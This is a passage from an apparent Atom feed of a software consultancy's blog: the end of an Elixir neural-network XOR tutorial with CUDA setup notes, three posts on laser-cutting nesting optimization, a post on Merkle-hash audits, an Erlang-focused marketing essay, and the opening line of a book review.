    model = build_model({nil, 1}, {nil, 1})
    data = Stream.repeatedly(&amp;amp;batch/0)

    model_state = train_model(model, data, 10)

    IO.inspect(
      Axon.predict(model, model_state, %{&amp;quot;x1&amp;quot; =&amp;gt; Nx.tensor([[0]]), &amp;quot;x2&amp;quot; =&amp;gt; Nx.tensor([[1]])})
    )
  end

end

XOR.run()
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;wrapping-up&quot; tabindex=&quot;-1&quot;&gt;Wrapping Up&lt;/h2&gt;
&lt;p&gt;After running the model, I got the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt;18:39:39.689 [debug] Forwarding options: [compiler: EXLA] to JIT compiler

18:39:39.729 [info] TfrtCpuClient created.
Epoch: 0, Batch: 950, loss: 0.6493790
Epoch: 1, Batch: 950, loss: 0.5824046
Epoch: 2, Batch: 950, loss: 0.5003822
Epoch: 3, Batch: 950, loss: 0.4245099
Epoch: 4, Batch: 950, loss: 0.3641715
Epoch: 5, Batch: 950, loss: 0.3175022
Epoch: 6, Batch: 950, loss: 0.2810990
Epoch: 7, Batch: 950, loss: 0.2520537
Epoch: 8, Batch: 950, loss: 0.2284686
Epoch: 9, Batch: 950, loss: 0.2089621
#Nx.Tensor&amp;lt;
  f32[1][1]
  EXLA.Backend&amp;lt;host:0, 0.3871477933.15073302.157805&amp;gt;
  [
    [0.9698225259780884]
  ]
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The model successfully learned the XOR function and was able to predict the output for the inputs &lt;code&gt;[0]&lt;/code&gt; and &lt;code&gt;[1]&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;It&#39;s so nice not to have to use Python for writing and running a model!&lt;/p&gt;
&lt;p&gt;Today was a productive day, full of learning and exploration. I&#39;m excited to continue my journey into the world of neural networks with Elixir.&lt;/p&gt;
&lt;p&gt;Next, I will see if I can get CUDA to work so I can use my NVIDIA 3090 card for something useful...&lt;/p&gt;
&lt;p&gt;... .But that&#39;s a story for another day.&lt;/p&gt;
&lt;!--

```
 sudo apt install nvidia-cuda-toolkit
$ wget https://developer.download.nvidia.com/compute/cuda/12.1.1/local_installers/cuda_12.1.1_530.30.02_linux.run
 sudo sh cuda_12.1.1_530.30.02_linux.run
  chmod a+x cuda_12.1.1_530.30.02_linux.run
  sudo ./cuda_12.1.1_530.30.02_linux.run --silent --driver

https://developer.nvidia.com/cudnn


sudo dpkg -i ./cudnn-local-repo-ubuntu2204-8.9.2.26_1.0-1_amd64.deb
sudo apt-get install libcudnn8=8.9.2.*-1+cuda12.1
sudo apt-get install libcudnn8-dev=8.9.2.*-1+cuda12.1

Mix.install( [{:torchx, &quot;~&gt; 0.3&quot;}],system_env: %{&quot;LIBTORCH_TARGET&quot; =&gt; &quot;cu116&quot;})
```

--&gt;</content>
  </entry>
  
  <entry>
    <title>AI Laser Metal Cutting - Part 3</title>
    <link href="https://happihacking.com/blog/posts/2023/2dpacking-3/"/>
    <updated>2023-06-16T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/2dpacking-3/</id>
    <summary>Replacing humans by AI optimization as a service</summary>
    <content type="html">&lt;h2 id=&quot;the-optimizer-part-3&quot; tabindex=&quot;-1&quot;&gt;The Optimizer - part 3&lt;/h2&gt;
&lt;p&gt;Timeline: 2009-2020. Potentially reducing CO2 globally by 1%.&lt;/p&gt;
&lt;h2 id=&quot;cutting-plan-optimization-as-a-service&quot; tabindex=&quot;-1&quot;&gt;Cutting plan optimization as a service&lt;/h2&gt;
&lt;p&gt;There are some interesting challenges involved when automatically and non-interactively creating cutting plans for humans to accept. Some are related to how we optimize, others are related to how customers think and feel.&lt;/p&gt;
&lt;p&gt;To mention but a few challenges:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What constitutes a &amp;quot;good&amp;quot; cutting plan. Humans are not logical creatures. Minimal cost may not be good enough, it has to &amp;quot;look good&amp;quot;.&lt;/li&gt;
&lt;li&gt;Providing cutting plan optimization as a service puts additional constraints on delivering production safe cutting plans.&lt;/li&gt;
&lt;li&gt;How do you properly sort when you have multidimensional values. Weighted sum is not the way.&lt;/li&gt;
&lt;li&gt;How to break down the optimization problem into smaller parts&lt;/li&gt;
&lt;/ul&gt;
&lt;img class=&quot;img-blog-smaller&quot; src=&quot;https://happihacking.com/images/2d-packing-3.png&quot; alt=&quot;Image generated by DALL-E&quot; title=&quot;Image generated by DALL-E&quot; /&gt;
&lt;p&gt;If we produce a chaotic looking plan that has 10% lower cost than a organized plan that looks like it makes sense, you can be sure the human operator will reject the chaotic plan. They simply believe the risk of breaking the laser machine&#39;s cutting-head is too high (even though we know it is safe). A production stand-still is very costly. Convincing them is not really an option so one has to try to produce a cutting plan that looks good, for some definition of &amp;quot;looks good&amp;quot;.&lt;/p&gt;
&lt;p&gt;Multidimensional sorting is a concept that is useful in many cases and the basic idea is to group values based on some defined epsilon-function per dimension, recursively. This way you can express things like solution A and B differ in the number of parts placed, but have e.g. a better cutting path, so they should be in the same groups with regards to number of placed parts, but possibly B comes before A since B has better cutting-path cost. This is the way. It is also awesome for debugging.&lt;/p&gt;
&lt;p&gt;On the topic of ordering things, we can easily imagine several measures for evaluating different properties of parts and clusters. For example, area-utility, a simple enough idea and one that seems meaningful. How much of the bounding box area is covered by a part&#39;s area. Even such simple things have funny properties, for instance, this measure can be interpreted as a circle being 78.54% square. One must take care to use the proper measures at the proper time and place and not draw the wrong conclusions. Indeed, circles and squares are very different when packing.&lt;/p&gt;
&lt;p&gt;Our approach to solving the extra everything-2D-packing-problem, was to sort of do what humans do, only better, and in a cold hard computer way. To this end we created many clever algorithms for creating pairs of parts, clusters of parts, expandable patterns, columns and rows, lattices and more. We also created advanced algorithms for splitting large clusters (sometime you must break things), and specialized algorithms to fill empty areas such as holes or other empty areas. But we also optimized in phases to place larger parts over multiple sheets and so forth.&lt;/p&gt;
&lt;p&gt;At the core of it all exists a fundamental practical representation of parts and how they interact with other parts allowing us to reason about it logically, a geometry constraint engine, a very reliable and high-precision no-fit-polygon algorithm, and a cutting path optimizer with its own sets of constraints.
The result: we could produce cutting plans that far exceed normal nesting in performance, is more production reliable than cutting plans made by humans, and that in practice replaces the human as the nesting controller. This is a huge benefit to the industry.&lt;/p&gt;
&lt;p&gt;In the end, due to Tomologic&#39;s patents being considered too general, some of Tomologic&#39;s ideas of clustering has spread and are now used by some of the more competent nesting softwares, although I imagine no other company has the same rigorous checks to guarantee production safety. Thanks to our ground breaking know-how, algorithms, and our unique way of regarding the 2D Nesting problem, Tomologic has contributed greatly to the reduction of CO2 in the metal cutting industry. I still believe that The Optimizer is the best fully-automatic production-safe AI-service for 2D packing in metal sheet cutting.&lt;/p&gt;
&lt;p&gt;To paraphrase Zlatan: Dear World - you&#39;re welcome.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>AI Laser Metal Cutting - Part 2</title>
    <link href="https://happihacking.com/blog/posts/2023/2dpacking-2/"/>
    <updated>2023-06-15T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/2dpacking-2/</id>
    <summary>Replacing humans by AI optimization as a service</summary>
    <content type="html">&lt;h2 id=&quot;the-optimizer-part-2&quot; tabindex=&quot;-1&quot;&gt;The Optimizer - part 2&lt;/h2&gt;
&lt;p&gt;Timeline: 2009-2020. Potentially reducing CO2 globally by 1%.&lt;/p&gt;
&lt;h2 id=&quot;2d-packing-extra-everything&quot; tabindex=&quot;-1&quot;&gt;2D packing - extra everything&lt;/h2&gt;
&lt;p&gt;Let&#39;s dive into the specifics. 2D packing, what is the actual problem we aim to solve?&lt;/p&gt;
&lt;p&gt;For simplicity, assume we have 20 unique irregular polygons (without holes) of various shapes and sizes that all fit together on a single sheet with room to spare. Also, let&#39;s disallow rotations and flips, and assume we use a greedy left-bottom placement strategy; there are 20! (20! = 20•19•18•...1) ways to place these polygons (if we include symmetrical solutions). Each solution will result in some amount of waste, and typically the goal is trying to produce as short a &lt;em&gt;horizon&lt;/em&gt; as possible, since after making a cut at the horizon there may be a useable part of the sheet left over to use down the line. You can naturally have both vertical and horizontal horizons, but that is just more of the same.&lt;/p&gt;
&lt;p&gt;There is no reasonable approach that will let us place and evaluate all 20! orders of parts, this is why this is a hard problem (adding 1 more part makes the problem 21 times bigger). A typical packing problem could easily have hundreds of unique parts with up to thousands of copies each, resulting in a huge number of parts to be placed. This is why all software employs heuristic approaches when trying solve these problems.&lt;/p&gt;
&lt;p&gt;Now, imaging allowing flips and rotations, and optimizing over multiple sheets. Fun!&lt;/p&gt;
&lt;img class=&quot;img-blog-smaller&quot; src=&quot;https://happihacking.com/images/2d-packing-2.png&quot; alt=&quot;Image generated by DALL-E&quot; title=&quot;Image generated by DALL-E&quot; /&gt;
&lt;p&gt;At Tomologic we had a fundamentally different approach compared to 2D Nesting at the time. The core idea is to reduce the waste and cutting time as much as possible. We achieved this by incorporating some brilliant insights and knowledge of the the cutting process from the founder of Tomologic, a long time laser machine operator. Basically, we took his know-how and created algorithms to make it automatic and systematic. We created a knowledge-based AI system. He invented some brilliant methods for controlling heat conduction and cut part stability.&lt;/p&gt;
&lt;p&gt;We removed assumption 1 (place parts individually) and 2 (cut parts independently) which, together with our proprietary cutting patterns, allowed us to create clusters of almost any shapes. Our algorithms and valuation models allowed us to compute an estimated multidimensional &lt;em&gt;cost&lt;/em&gt; for a particular cluster of parts, taking into account how it needs to be split and cut to guarantee production safety without all that waste. The revolutionizing idea lies in our algorithms for controlling how heat spreads through the metal sheet and how to keep parts from moving and tilting during the cutting process, and taking this into account when creating the packing and cutting paths.&lt;/p&gt;
&lt;p&gt;Thus we created an even more complicated 2D packing problem, where the cutting path is part of the packing problem and the &lt;em&gt;cost&lt;/em&gt; of cutting a cluster of parts depends on where on the sheet it is placed since location impacts how to cut. This interdependency makes it so much harder.
In addition to this, by removing assumption 1 and 2, we are also faced with a precision problem that traditional Nesting does not have - since we are cutting clusters of parts, we need to guarantee the cut parts are within acceptable tolerances when measured. When making a cut between two parts (not simply straight lines), this puts additional complexity on placement algorithms. Even when we do use safety distances, these are also optimized based on the characteristics of adjacent parts or clusters. We also needed a clever constraint engine to handle how parts interact and produce &lt;em&gt;pockets&lt;/em&gt; of waste between them.&lt;/p&gt;
&lt;p&gt;To make it better (and harder) we also allowed free rotations, where most Nesting allows rotations in discrete increments (e.g. 5 degrees). This basically makes our search space infinite, at least in theory, in a practical implementation rotations are limited by 64-bit floating point numbers.&lt;/p&gt;
&lt;p&gt;So, how does one get any results at all given this daunting scope? You need a great team, a dash of creativity, and a lot of hard work.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>AI Laser Metal Cutting - Part 1</title>
    <link href="https://happihacking.com/blog/posts/2023/2dpacking-1/"/>
    <updated>2023-06-14T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/2dpacking-1/</id>
    <summary>Replacing humans by AI optimization as a service</summary>
    <content type="html">&lt;h2 id=&quot;the-optimizer-part-1&quot; tabindex=&quot;-1&quot;&gt;The Optimizer - part 1&lt;/h2&gt;
&lt;p&gt;Timeline: 2009-2020. Potentially reducing CO2 globally by 1%.&lt;/p&gt;
&lt;h2 id=&quot;intro&quot; tabindex=&quot;-1&quot;&gt;Intro&lt;/h2&gt;
&lt;p&gt;&amp;quot;We made an AI and attached it to a 6kW laser cutting machine!&amp;quot; ;).&lt;/p&gt;
&lt;p&gt;On a more serious note. Discrete optimization problems are ubiquitous and you will find them in many domains. Laser cutting of sheet metal is no exception. Sheet metal cutting is a crucial part of the multi-billion-dollar metalworking industry, serving various sectors like automotive, aerospace, construction, electronics, and more. It&#39;s used for producing parts such as car body panels, aircraft components, building facades, electronic casings, and countless other metal parts. The optimization of this process is crucial, given the industry&#39;s size, to save on costs and reduce waste. Specifically the optimization of the placement of parts to be cut, on one or more sheets, is the problem we will touch on in these posts.&lt;/p&gt;
&lt;h2 id=&quot;2d-nesting&quot; tabindex=&quot;-1&quot;&gt;2D Nesting&lt;/h2&gt;
&lt;p&gt;The &lt;em&gt;Nesting Problem&lt;/em&gt; in sheet metal cutting is similar to arranging as many gingerbread cookies as possible onto a baking sheet without any overlap, aiming to utilize the entire surface. Each cookie represents a part to be cut from the sheet, and the goal is to minimize the leftover or wasted dough (the unused metal), while fitting all the desired cookie shapes (metal parts). This is a complex task that involves deciding the best layout of the &amp;quot;cookies&amp;quot; to minimize waste.&lt;/p&gt;
&lt;img class=&quot;img-blog-smaller&quot; src=&quot;https://happihacking.com/images/2d-packing-1.png&quot; alt=&quot;Image generated by DALL-E&quot; title=&quot;Image generated by DALL-E&quot; /&gt;
&lt;p&gt;The Nesting Problem is a type of 2D packing problem, a combinatorial optimization or discrete optimization problem. The problem becomes increasingly complex as the number of different parts and sizes increase. Solving this problem efficiently can lead to significant cost savings, by minimizing waste and maximizing the usage of raw materials. It also reduces the environmental impact by minimizing scrap metal.&lt;/p&gt;
&lt;p&gt;The problem is further complicated by issues such as heat expanding the metal sheet, customers having requirements on the rotations and flipping of parts, and avoiding risks such as a part tilting and potentially destroying the cutting head causing expensive production outages. The side constraints are many and not always obvious.&lt;/p&gt;
&lt;p&gt;Parts can also contain empty areas, or &lt;em&gt;holes&lt;/em&gt;, inside the outer geometry that also can be used for placing smaller parts. Parts can generally have any rotation or flip transformation unless specifically disallowed.&lt;/p&gt;
&lt;p&gt;This results in a truly mind-boggling search space, and not unsurprisingly this is one of the hardest problems in computer science, an NP-hard problem. Such fun!&lt;/p&gt;
&lt;p&gt;Various algorithms and heuristic are used to tackle this problem, like the bottom-left placement algorithm, the best-fit algorithm, and metaheuristic algorithms such as Local Search, Simulated Annealing, Genetic Algorithms, and many many more. In practice, one often seeks to find a good enough solution that significantly reduces waste, even if it isn&#39;t the optimal solution.&lt;/p&gt;
&lt;p&gt;During my time at Tomologic, I was fortunate to work with these very interesting and fun challenges that often gave rise to equally interesting and very often hard or at least tricky sub-problems, very rarely did anyone on the team go: &amp;quot;Well, that was easy!&amp;quot;&lt;/p&gt;
&lt;h2 id=&quot;2d-nesting-pre-tomologic&quot; tabindex=&quot;-1&quot;&gt;2D Nesting pre-Tomologic&lt;/h2&gt;
&lt;p&gt;After that brief introduction to Nesting, let&#39;s get into the actual issue at hand.
Nesting, as it was (is?) used in the industry, produces an uncomfortable amount of waste due to some simplifications that are introduced to &amp;quot;solve&amp;quot; certain production requirements.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Assumption 1&lt;/strong&gt;: Place parts individually. This is achieved by introducing a safety distance around each part. This ensures that parts do not get in the way of the cutting head, since that may cause damage to it, which would cause a production interruption associated with a high cost. This is incidentally also the root of the waste problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Assumption 2&lt;/strong&gt;: Cut parts independently. The cutting path (how to move the laser cutting head), is basically just solving a (also NP-hard) Traveling Salesman Problem for each sheet since each part can be cut individually. There are naturally exceptions. Fun fact: when cutting many small parts you may actually want to cut in a way as to spread out the heat as much as possible, that is, not the shortest path.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These two simplifications allow the algorithms to use significant simplifications on how geometries are represented, and how the placement of parts is performed. Combined, this significantly reduces the computational effort needed to explore the search space.&lt;/p&gt;
&lt;p&gt;In the next two parts, I will talk more about Tomologic&#39;s view of Nesting and how we solved a more involved problem to achieve up to 50% reduction in waste material and up to 30% reduction in cutting time.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Audits through Merkle Root Hashes</title>
    <link href="https://happihacking.com/blog/posts/2023/blockchain-audit/"/>
    <updated>2023-06-09T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/blockchain-audit/</id>
    <summary>Blockchain - The good parts</summary>
    <content type="html">&lt;h2 id=&quot;when-in-doubt-sell-shovels&quot; tabindex=&quot;-1&quot;&gt;When in doubt, sell shovels!&lt;/h2&gt;
&lt;p&gt;They say that during the gold rush only people who sold shovels made a fortune. We at Happi Hacking
spent some time in the world of blockchains, learning how to build some pretty solid shovels. We
took part in developing a blockchain (aeternity) from scratch, including a smart contract language
(Sophia), a VM (&lt;a href=&quot;https://happihacking.com/blog/posts/2023/fate/&quot;&gt;FATE&lt;/a&gt;), and all other infrastructure needed for running a public blockchain.&lt;/p&gt;
&lt;h2 id=&quot;so-where-should-we-dig&quot; tabindex=&quot;-1&quot;&gt;So, where should we dig?&lt;/h2&gt;
&lt;p&gt;The underlying math and cryptography used for blockchains are pretty solid. The foundation didn&#39;t
originate in the blockchain world. Blockchain technology is merely an application of algorithms that
can be found elsewhere in cryptography, for example in SSL/TLS where it is used for encrypting
internet traffic (the padlock in your browser). It is also used in GIT, in distributed databases
etc.&lt;/p&gt;
&lt;h2 id=&quot;merkle-tries-at-a-glance&quot; tabindex=&quot;-1&quot;&gt;Merkle tries at a glance&lt;/h2&gt;
&lt;p&gt;We implemented Patricia Merkle Tries for æternity, and I personally got a bit of a crush on this
data structure. I won&#39;t even try to explain how they work, but for this story the important bit is
that the contents of a Merkle tree can be represented by the Merkle hash (or root hash) in a way
that is unfeasible to fake (because of cryptography). The Merkle trie can in turn contain a huge
amount of data, making the root hash represent all this data.&lt;/p&gt;
&lt;p&gt;One way of thinking of blockchains is that it is a distributed database, whose state is represented
by the root hash of its content along with the history of transactions. The only way of changing the
state of this database is to add blocks of transactions to the database, yielding a new root hash
that represents the new state and the new history. This is not the whole truth, but it is a
reasonable abstraction.&lt;/p&gt;
&lt;h2 id=&quot;merkle-tries-and-accounts&quot; tabindex=&quot;-1&quot;&gt;Merkle tries and accounts&lt;/h2&gt;
&lt;p&gt;So what is the content of the database? This is up to the blockchain, but in the case of crypto
currencies, there will be balances in some representation included in the database. Are there other
domains where this setup is applicable? Obviously in banks, but also for ledgers in accounting.&lt;/p&gt;
&lt;h2 id=&quot;accountability-and-audits&quot; tabindex=&quot;-1&quot;&gt;Accountability and audits&lt;/h2&gt;
&lt;p&gt;Imagine that a company stores all its customer-related transactions in a Merkle trie. It is not
necessary to use this trie as the actual database for the application, e.g., if it becomes too slow
for operational purposes, but as crucial events happens (e.g., Alice sends Bob some money) the
events could be imported into the Merkle trie, yielding a new root hash.&lt;/p&gt;
&lt;p&gt;It is a property of Merkle hashes that they do not expose the content of the trie, at least unless
you happen to guess the content of the entire trie. This means that the root hashes can be published
to authorities, customers or even to the general public, without exposing the actual balances.&lt;/p&gt;
&lt;p&gt;So, what good is publishing the Merkle hashes if it doesn&#39;t tell us what is in the database?&lt;/p&gt;
&lt;h2 id=&quot;proof-of-inclusion&quot; tabindex=&quot;-1&quot;&gt;Proof of Inclusion&lt;/h2&gt;
&lt;p&gt;A proof of inclusion is a cryptographically safe way of proving that some part of the Merkle trie
looks in a certain way given a specific Merkle hash. For example, given a root hash, you can provide
a proof of inclusion that shows that a specific account had a certain balance in the underlying
Merkle trie. And this without exposing the balances of any other account.&lt;/p&gt;
&lt;p&gt;If an external entity collects the published root hashes, they can be used in a later audit to
follow flows of money between certain accounts without compromising the privacy of other account
holders, and since the root hashes were published at the time they were constructed, there is no way
for the auditee to change the history of its database.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;While public blockchains in general might or might not have a future, the underlying technology is
alive and kicking. We have hinted towards one solid use case, but there are others. To name a few:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Chain of custody applications&lt;/li&gt;
&lt;li&gt;Auditing election results&lt;/li&gt;
&lt;li&gt;Origin tracking of natural resources&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If this blog post gave you some ideas, go ahead and contact us. We are always ready to build some new shovels!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>It is never about technology - until it is</title>
    <link href="https://happihacking.com/blog/posts/2023/its_not_technology/"/>
    <updated>2023-06-06T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/its_not_technology/</id>
    <summary>Then it is Erlang</summary>
    <content type="html">&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/water_and_sky.jpg&quot; alt=&quot;A calm sea at sunset.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A calm sea at sunset.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;In software development, there&#39;s a saying that I&#39;ve come to appreciate:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;It&#39;s never about technology - until it is.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It&#39;s a bit of a riddle, a paradox that seems to contradict itself. But as you dwell deeper into the world of code, systems, and digital solutions, you&#39;ll find that this statement holds a profound truth.&lt;/p&gt;
&lt;p&gt;Let&#39;s break it down.&lt;/p&gt;
&lt;p&gt;When we say, &#39;It&#39;s never about technology&#39; we&#39;re acknowledging that at the heart of every software solution, every app, and every digital tool, we&#39;re trying to solve a human problem. We&#39;re not just writing code for the sake of writing code. We&#39;re creating solutions to make people&#39;s lives easier, to streamline processes, to bring joy, or to connect people. Technology is not the end goal; it&#39;s the means to an end.&lt;/p&gt;
&lt;p&gt;But then we say, &#39;until it is&#39;. This is where the paradox comes in. While our ultimate goal is to solve human problems, we can&#39;t ignore the technology itself. The tools we use, the systems we design, the code we write - they all matter. They&#39;re the vehicle that carries our solutions from concept to reality. And if that vehicle isn&#39;t built well, it won&#39;t get us where we need to go.&lt;/p&gt;
&lt;p&gt;Let&#39;s look at two real-world examples. First, take Klarna, a Swedish fintech company, that had a simple idea: bring trust to e-commerce by providing a buy-now-pay-later service. (I wrote more about the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/Installment_plans/&quot;&gt;Klarna installment plans project&lt;/a&gt; separately.) This idea wasn&#39;t about technology; it was about solving a problem. Merchants worried about getting paid, and customers worried about receiving what they ordered. Klarna&#39;s solution addressed both concerns in a very simple way: include a paper invoice in the delivery.&lt;/p&gt;
&lt;p&gt;As Klarna grew they needed to handle an increasing number of transactions, maintain a robust service and deliver features quickly. That&#39;s where technology came into play. Fortunately, Klarna had chosen Erlang as the main technology for their online payment system.&lt;/p&gt;
&lt;p&gt;Erlang allowed Klarna to rapidly prototype and test new features, thanks to its functional programming paradigm. It also provided robustness and scalability, critical for a company handling billions in payments. Klarna&#39;s success story isn&#39;t just about a great business idea; it&#39;s also about choosing the right technology to execute that idea.&lt;/p&gt;
&lt;p&gt;Our other example is WhatsApp. It wasn&#39;t about groundbreaking technology; it was about providing a simple, reliable, and user-friendly platform for people to connect. And connect they did, in the billions!&lt;/p&gt;
&lt;p&gt;WhatsApp had also wisely chosen Erlang to implement its secure messaging service. Erlang was the unsung hero, working tirelessly behind the scenes to ensure that every &#39;hello&#39;, every &#39;happy birthday&#39;, and every &#39;I love you&#39; was delivered without a hitch. It allowed WhatsApp to manage billions of messages with a relatively small team of engineers, a feat that was nothing short of miraculous.&lt;/p&gt;
&lt;p&gt;Erlang&#39;s functional programming paradigm allowed WhatsApp to rapidly prototype and test new features. It also provided the robustness and scalability needed to handle an ever-growing number of messages. WhatsApp&#39;s success story isn&#39;t just about a great business idea; it&#39;s also about choosing the right technology to execute that idea.&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/people_working.jpg&quot; alt=&quot;A table and people hands one holding a phone.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A table and people hands one holding a phone.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;Let&#39;s not forget the unsung heroes - the people. People are the lifeblood of any organization. They are the ones who breathe life into technology, turning cold, hard code into vibrant, dynamic solutions. At HappiHacking, we&#39;re all about people. We believe that the right people, armed with the right tools, can create magic. And by magic, we mean robust, scalable, and efficient solutions that drive business growth.&lt;/p&gt;
&lt;p&gt;But here&#39;s the challenge - how do we strike the perfect balance? How do we ensure that our focus on people doesn&#39;t overshadow the importance of business value or the role of technology? This is where we need a guiding principle, a compass to navigate the delicate balance between these crucial elements.&lt;/p&gt;
&lt;p&gt;That is where the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/the_happy_path/&quot;&gt;Happy Path Method&lt;/a&gt; comes in. It focuses on the positive outcomes, the &#39;happy paths&#39;, rather than getting bogged down by every possible thing that could go wrong. It&#39;s about fostering a positive mindset and creating solutions that work. It&#39;s about making the journey toward the solution as enjoyable as reaching the destination itself. And trust me, it&#39;s a game-changer!&lt;/p&gt;
&lt;p&gt;The Happy Path Method is a unique approach that, contrary to its name, isn&#39;t about skipping through fields of daisies. It&#39;s a serious, business-focused methodology that emphasizes delivering value above all else. It&#39;s about understanding what success looks like for a business and then charting the most direct path to achieve that success.&lt;/p&gt;
&lt;p&gt;It&#39;s easy to get lost in the weeds of technical details and potential edge cases. While it&#39;s important to consider these factors, they should not overshadow the ultimate goal - delivering value to the business. The Happy Path Method keeps this goal front and center. It&#39;s about identifying the core functionality that will deliver the most value, and focusing on implementing that functionality first and foremost.&lt;/p&gt;
&lt;p&gt;This approach does not ignore potential problems or challenges. Instead, it acknowledges them but does not allow them to derail the development process. It&#39;s about maintaining a positive, solution-oriented mindset. It&#39;s about saying, &#39;Yes, we will likely encounter challenges along the way, but let&#39;s not allow those challenges to distract us from our primary goal.&#39;&lt;/p&gt;
&lt;p&gt;At HappiHacking, we&#39;ve embraced the Happy Path Method in our work. We understand that our clients are not just looking for technical expertise; they&#39;re looking for partners who can help them realize their business goals. We focus on understanding our client&#39;s needs, identifying the solutions that will deliver the most value, and then implementing those solutions in the most efficient and effective way possible.&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/Clean_desk_MacBook_with_Erlang.png&quot; alt=&quot;A computer with Erlang.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A computer with Erlang.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;When it comes to technology our go-to tool is Erlang. If we can not use Erlang, we are also well-versed in most other programming languages, and we can take the Erlang philosophy with us to any environment.&lt;/p&gt;
&lt;p&gt;Erlang comes with a set of tools and principles that make it easier to build robust, scalable, and maintainable applications. One of these principles is the idea of supervisors and independent processes.&lt;/p&gt;
&lt;p&gt;In Erlang, a supervisor is a process that monitors other processes, known as worker processes. If a worker process encounters an error and crashes, the supervisor automatically restarts it. This means that even if a part of your system fails, the rest of it can continue to function normally. It&#39;s like having a safety net that catches you when you fall, allowing you to get back up and continue on your path.&lt;/p&gt;
&lt;p&gt;This ties in beautifully with the Happy Path Method. When you&#39;re focusing on the happy path, you&#39;re focusing on the core functionality that delivers the most value. But what happens if an error occurs? That&#39;s where Erlang&#39;s supervisors come in. They ensure that even if a part of your system encounters an error, it doesn&#39;t derail your entire process. You can continue focusing on the happy path, knowing that the supervisors have got your back.&lt;/p&gt;
&lt;p&gt;Moreover, Erlang&#39;s support for independent processes means that different parts of your system can operate concurrently and independently. If one process encounters an issue, it doesn&#39;t affect the others. This means you can continue delivering value through the other parts of your system, even when facing challenges.&lt;/p&gt;
&lt;p&gt;In essence, Erlang and OTP provide a technical framework that supports the Happy Path Method. They allow you to focus on delivering value, without getting bogged down by errors or failures. They provide the resilience and reliability that let you keep your eyes on the prize - the happy path that leads to business success. At HappiHacking, we leverage these tools to help our clients navigate their path to success, one happy step at a time.&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/logo_with_sun.jpg&quot; alt=&quot;Part of the HappiHacking logo.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;Part of the HappiHacking logo.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;As for our services at HappiHacking, we&#39;re not just about coding. We&#39;re about creating solutions. We&#39;re about understanding your business needs and translating them into technology. We&#39;re about leveraging our expertise in Erlang, Elixir, Java, testing, DevOps, and other technologies to deliver solutions that are tailor-made for your business. From system architecture and design, to development and code reviews, we&#39;ve got you covered. We&#39;re not just service providers; we&#39;re your partners in growth.&lt;/p&gt;
&lt;p&gt;The next time you think about technology, remember - it&#39;s not just about the code. It&#39;s about the people who make the code work. It&#39;s about the methods that make the journey enjoyable.&lt;/p&gt;
&lt;p&gt;So, yes, it&#39;s never technology - until it is. We must always remember the human problems we&#39;re solving, but we can&#39;t ignore the technology that helps us solve them. It&#39;s a delicate balance, a dance between two seemingly opposing forces. But when we get it right, when we find that sweet spot between problem and solution, between human and technology, that&#39;s when we create something truly remarkable.&lt;/p&gt;
&lt;p&gt;When it comes to choosing a technology partner who understands your needs and delivers solutions that drive growth. Choose wisely, choose HappiHacking!&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: right;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/crazy_happy_happi.jpg&quot; alt=&quot;A Happy Happi.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A Happy Happi.&quot; /&gt; &lt;/div&gt;
</content>
  </entry>
  
  <entry>
    <title>Book Review &quot;The Goal - A Process of Ongoing Improvement&quot; by Eliyahu M. Goldratt and Jeff Cox</title>
    <link href="https://happihacking.com/blog/posts/2023/the_goal/"/>
    <updated>2023-06-02T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/the_goal/</id>
    <summary>Unleashing the Power of the Theory of Constraints on Software Development</summary>
    <content type="html">&lt;p&gt;Book Review “The Goal: A Process of Ongoing Improvement&amp;quot; by Eliyahu M. Goldratt and Jeff Cox&lt;/p&gt;
